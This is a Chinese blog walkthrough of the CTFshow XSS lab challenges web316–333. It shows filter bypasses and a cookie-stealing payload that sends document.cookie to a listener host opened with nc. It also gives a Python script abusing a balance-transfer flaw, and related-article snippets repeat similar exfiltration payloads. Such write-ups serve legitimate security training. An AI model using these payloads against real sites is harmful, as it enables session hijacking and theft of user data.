CTFSHOW xss篇

最新推荐文章于 2024-06-07 11:58:48 发布
最新推荐文章于 2024-06-07 11:58:48 发布
阅读量9.2k 收藏 14
点赞数 8
分类专栏: CTFSHOW web入门系列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/111644350
版权

web316

xss平台 https://xss.pt/xss.php
创建项目
在这里插入图片描述
选择默认模块
在这里插入图片描述
一直下一步,然后随便那个代码放到题目输入框中
在这里插入图片描述
再刷新下题目
在这里插入图片描述

最后看下项目
在这里插入图片描述
在这里插入图片描述
结束

web317、318、319

317过滤了script
318过滤了img
在那些代码中找没有script和img的然后出不来flag就多试几次,我试的这个是可以的
在这里插入图片描述

web320、321、322

过滤了空格 用tab键代替空格,代码还是用上面的

web323、324、325、326

过滤了iframe
<BODY ONLOAD=document.location='http://xxxx:5000?cookie='+document.cookie;>
输入后服务器开启监 nc -lvp 5000(bot会每隔一段时间访问输入的内容)
看监听到的内容会有flag
在这里插入图片描述

web327

收件人一定得是admin,在内容和发件人里面都填上payload(咱也不知道哪个可以)。
然后payload还是原来xss平台上的就可以,比如下面这种类型的
在这里插入图片描述

web328、329、330、331

用xss平台的超强模块,需要大家自己在网上找一个。(前面给的网站没有这个模块)
在这里插入图片描述
就可以得到页面的源码
在这里插入图片描述
html解码下就会有flag

下面两个非预期解

web332

随便注册两个用户用其中一个给另外一个转账-999999999就可以购买flag了

web333

可以转账给自己,而且得保证自己最低有1块钱,写个脚本

import requests
import re
import time
x=5
url="http://6e9efd13-ce49-48cd-8eae-53fa92d01651.chall.ctf.show/api/amount.php"
url2="http://6e9efd13-ce49-48cd-8eae-53fa92d01651.chall.ctf.show/api/getFlag.php"
headers={'Cookie':'PHPSESSID=tatvacnnqeihmuic94f1ei7275'}  #自己登录后的sessionid
while True:
	print(x)
	t=x-1
	data={
	'u':'456', #注册的用户名
	'a':str(t)
	}
	r=requests.post(url,headers=headers,data=data)
	print(r.text)
	if(x>10000):
		r2=requests.get(url2,headers=headers)
		print(r2.text)
		break
	x+=t
yu22x
关注
  • 8
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 12
    评论
专栏目录
Web安全测试之XSS实例讲解
09-01
本文主要介绍Web安全测试之XSS,这里详细整理了测试XSS的资料,并附示例代码和详细讲解,有需要的小伙伴可以参考下
CTFSHOW-XSS
byname1的博客
03-10 1062
说来惭愧,很久没发博客了,主要是寒假有点摆了,然后ctfshow很多类型我在同时刷,这几天比如sql,xxe,php反序列化,jwt这些我就陆陆续续地能发出来了。文末有参考WP,这两篇WP对于没学过JS的我做题用处很大,先谢过Y4师傅和bfeng师傅了!!!
【CTF-Web】XSS漏洞学习笔记(附ctfshow web316-333题目)
最新发布
jayq1的博客
06-07 994
XSS
ctfshow-xss
Vincent0sen的博客
09-13 284
ctfshow刷题记录
ctfshow-web[XSS]
m0_72898152的博客
02-04 829
ctfshow
ctfshow XSS漏洞web316-328
m0_62584974的博客
04-07 1814
2022/4/7 Web316 XSS 反射性XSS 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! CEYE - Monitor service for security testing 先在这个网站注册一个账号获得一个临时的域名 红框内的是临时的域名 然后在方框中输入: <script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..
ctfshowXSS
njh18790816639的博客
05-19 320
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 大致的介绍一下XSS漏洞!此时我们可以使用这个xss平台***https://xss.pt/xss.php*** 注.
腾讯系列的XSS注入篇
09-05
本资料包"心伤的瘦子腾讯XSS系列"包含了21篇文章,详细探讨了腾讯系列的XSS注入问题。以下是对这一主题的深入分析: 1. **XSS攻击类型**:XSS攻击主要分为三类:反射型XSS、存储型XSS和DOM型XSS。反射型XSS是通过...
backtrack之XSS
04-26
XSS攻击的类型主要包括存储型XSS(Stored XSS)、反射型XSS(Reflected XSS)和DOM型XSS(DOM-based XSS)。存储型XSS发生在用户提交的数据被永久存储在服务器上并展示给其他用户时;反射型XSS则是通过诱使用户点击...
XSS攻击进阶篇.zip
09-27
**XSS(跨站脚本)攻击是一种常见的网络安全威胁,主要针对Web应用程序。它利用了网站的信任机制,通过注入恶意脚本,使用户在不知情的情况下执行这些脚本,从而可能导致敏感信息泄露、账户劫持以及其他恶意行为。**...
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
ctfshowxss(有图易操作)
qq_50589021的博客
08-14 641
XSS平台 document.cookie 获取饼干的js代码 推荐xss平台:http://xsscom.com/ , https://xss.pt/ JavaScript的 document.cookie 将以字符串的方式返回所有的cookie,类型格式: cookie1=value; cookie2=value; cookie3=value; 2021-08-06 web316(反射型) 利用xss平台里的代码进行攻击: http://xsscom.com/ 建造完项目以后,复制代码: <sc
ctfshow XSS web316~web333
shinygod的博客
11-25 1848
ctfshow XSS web316~web333
kali之beef使用以及ctf.show的XSS(web316-web333)
wanan的博客
09-30 439
kali之beef使用以及ctf.show的XSS(web316-web333)
ctfshowXSS
cosmoslin的博客
02-05 934
web 316(反射型) 测试<script>alert(1)</script>,无过滤 在服务器上开启监听 python3 -m http.server 39543 外带数据: <script>location.href="http://x.xx.xx.xx:39543/"+document.cookie</script> <script>window.location.href="http://x.xx.xx.xx:39543/"+docu
CTFshow web入门 web316-web333 XSS
qq_56815564的博客
07-05 1819
我tm又来了,总之top10先过一遍,到第三个XSS了,下一个要去看了,看了网上很多wp总感觉不是太全,所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足,从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码。
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
Jay17的博客
09-28 4318
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
ctfshow_web316-326_反射型XSS
记录学习成长之路上的点点滴滴
05-08 699
2023/05/07 ctfshow刷题 web316-326 反射型XSS
CTFshow——XSS
D.MIND 的博客
04-01 604
文章目录web316web317——过滤了scriptweb318——过滤了imgweb319——web320、321、322——过滤空格 web316 利用xss平台里的代码进行攻击: https://xss.pt/xss.php <sCRiPt sRC=//xss.pt/kUIB></sCrIpT> web317——过滤了script <img src=x onerror=s=createElement('script');body.appendChild(s);s.sr
ctfshow XSS
08-18
您好!对于XSS(跨站脚本攻击)的问题,我可以给您一些基本的解释和防范措施。 XSS是一种利用网页应用程序对用户进行攻击的方式。攻击者通过在网页中注入恶意脚本,使得用户在浏览网页时执行这些恶意脚本,从而实现攻击目的。 为了防止XSS攻击,以下是一些常见的防范措施: 1. 输入过滤和验证:对用户输入数据进行过滤和验证,确保输入的内容符合预期。可以使用白名单过滤或编码转义来防止恶意脚本的注入。 2. 输出编码:在将用户输入的内容输出到网页上时,对特殊字符进行编码转义,确保不会被当作代码执行。 3. 使用HTTP-only标志:将cookie标记为HTTP-only,使得它们仅能在服务器端被访问,减少cookie被盗取的风险。 4. CSP(内容安全策略):通过在HTTP响应头中设置CSP策略,限制网页中可以执行的内容,防止恶意脚本的注入。 5. 使用安全框架和库:使用经过安全审查和测试的安全框架和库,例如使用OWASP ESAPI等工具来防范XSS攻击。 这些只是一些常见的防范措施,具体的防范措施还需要根据实际情况和应用程序的特点进行调整和定制。同时,定期进行安全审计和漏洞扫描也是非常重要的。 希望以上信息对您有所帮助!如有更多问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值